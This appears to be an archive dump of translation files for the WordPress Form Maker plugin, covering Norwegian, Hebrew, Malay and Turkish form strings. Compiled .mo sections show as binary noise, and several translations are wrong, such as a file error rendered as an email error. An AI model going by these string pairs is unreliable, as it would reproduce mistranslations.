msgid "December"
msgstr "Desember"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Feil, feil sikkerhetskode."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Din IP er svartelistet. Ta kontakt med nettstedet administrator"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Filen overskrider den tillatte størrelsen på"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Beklager, du har ikke lov til å laste opp denne filtypen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Feil, kan filen ikke flyttes."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Dette feltet %s krever en unik og denne verdien var allerede sendt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Feil, ble e-posten ikke sendt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Ingenting ble sendt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Din skjema ble sendt inn."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Feil, ble e-posten ikke sendt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Din e-postadresse er allerede bekreftet."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Din e-post har blitt bekreftet."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Din e-postbekreftelse er utløpt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Adresse verifisering er ugyldig."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "Feltet er påkrevd."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Dette er ikke en gyldig e-postadresse."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "Du kan ikke velge tidligere datoer. Velg en dato fra den nåværende."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "Den"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "Verdien må være mellom "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Kvantitet"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Poengsummen din bør være mindre enn "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Tittel"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Første"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Siste"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "(Midtre)"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Retningsnummer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefonnummer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cent"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Fra"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Å"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "gå "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Tilbakestill "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Velg et felt "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Velg en dato"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-he_IL.mo000060400000007631152434416630012162 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��
A
L
Y
f
m
t

{
�
4�
2�
'�
#
0;	A
KV_
hsz
������	��(F5 |���+�M
+N

z
�
(�
h�
2;O.�!�W�14f!w4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:56+0400
PO-Revision-Date: 2015-05-22 16:56+0400
Last-Translator: 
Language-Team: 
Language: he
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
אפרילקידומתאוגוסטסנטעירארץדצמברדולריםשגיאה, דואר אלקטרוני לא נשלח.שגיאה, הקובץ לא ניתן להעביר.שגיאה, קוד אבטחה שגוי.פברוארראשוןמן ללכת ינואריולייוניאחרוןמרץמאיאמצעישום דבר לא הוגשה.נובמבראוקטוברמס' טלפון:מיקוד / מיקודכמות איפוס בחר תאריךבחר שדה ספטמברמצטערים, אינך רשאי להעלות קובץ מסוג זה.אזור / מדינה / אזורכתובת רחוברחוב שורת כתובת 2Theהקובץ חורג מהגודל המותרשדה %s דורשת כניסה ייחודית ערך זה הוגשה כבר.זו אינה כתובת דאל חוקית.כותרתאלקישור אימות אינו חוקי.אתה לא יכול לבחור את התאריכים לשעבר. בחר תאריך החל מנוכחי.כתובת הדוא"ל שלך כבר מאומתת.הדואר האלקטרוני שלך אומת בהצלחה.אימות דוא"ל שלך נגמרת זמן.הטופס נשלח בהצלחה.IP שלך הוא ברשימה שחורה. אנא צור קשר עם מנהל האתר. הציון שלך צריך להיות פחות משדה חובה.ערך חייב להיות ביןlanguages/form_maker-ms_MY.mo000060400000007166152434416630012231 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
S
X
^
f
m
v
 |
'�
!�
�
�
�
�
#)$0U^fu����	�=�&5K"ODr ����M
!N
"p
'�
%�
=�
)I`4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:01+0400
PO-Revision-Date: 2015-05-22 17:01+0400
Last-Translator: 
Language-Team: 
Language: ms
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AprilKod KawasanOgosCentsBandar:negaraDisemberDolarKesilapan, e-mel tidak dihantar.Kesilapan, fail tidak boleh digerakkan.Kesilapan, kod salah Keselamatan.FebruariPertamaDaripergi JanuariJulaiJunterakhirMacBolehTengahTiada apa-apa jua telah dikemukakan.NovemberOktoberNombor TelefonPos / Zip CodeKuantitimenetapkan semulaPilih Tarikh yangPilih Bidang yang SeptemberMaaf, anda tidak dibenarkan untuk memuat naik fail jenis ini.Negeri / Daerah / WilayahStreet AddressStreet Alamat Baris 2IniFail melebihi saiz yang dibenarkanBidang %s memerlukan catatan yang unik dan nilai ini telah dihantar.Ini bukan alamat e-mel yang sah.Tajuk:UntukLink pengesahan tidak sah.Anda tidak boleh memilih tarikh bekas. Pilih tarikh bermula dari satu semasa.Alamat e-mel anda telah disahkan.E-mel anda telah berjaya disahkan.Pengesahan e-mel anda telah tamat masa.Borang anda telah berjaya diserahkan.Ip anda dalam senarai hitam. Sila hubungi pentadbir laman webSkor anda hendaklah tidak kurang daripadamedan yang diperlukan.nilai mesti di antaralanguages/form_maker-tr_TR.po000060400000056641152434416630012244 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:05+0400\n"
"PO-Revision-Date: 2015-05-22 17:05+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: tr\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Sokak Adresi"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Adres Satırı 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Şehir"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Eyalet / İl / Bölge"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Posta / Posta Kodu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Ülke"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Ocak"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Şubat"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Mart"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Nisan"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Mayıs"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Haziran"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Temmuz"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Ağustos"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Eylül"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Ekim"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
